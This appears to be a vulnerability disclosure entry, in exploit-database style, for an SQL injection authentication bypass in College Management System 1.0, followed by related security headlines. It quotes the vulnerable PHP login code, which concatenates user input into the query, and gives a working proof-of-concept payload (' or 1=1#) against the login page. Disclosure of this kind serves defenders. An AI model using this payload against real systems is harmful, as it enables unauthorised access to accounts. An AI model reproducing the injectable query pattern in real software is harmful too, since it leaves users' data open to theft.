College Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
# Exploit Title: college management system - SQL Injection Authentication Bypass
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://www.eedunext.com/
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Kali Linuxin login/login.php in line 8 :
$username=$_POST["email"];
$password=$_POST["password"];
$query="select * from login where user_id='$username' and Password='$password' ";
$result=mysqli_query($con,$query);
POC :
http://127.0.0.1/2/College-Management-System/login/login.php
username : ' or 1=1#
password : 123456
Related posts:
Unveiling the Hidden Risks of Routing Protocols
IRS-authorized eFile.com tax return software caught serving JS malware
Cyera Launches From Stealth With $60M to Identify, Secure, and Remediate Cloud Data Security Risks
New PoC Exploit for Apache OfBiz Vulnerability Poses Risk to ERP Systems
Hive Ransomware Hackers Begin Leaking Data Stolen from Tata Power Energy Company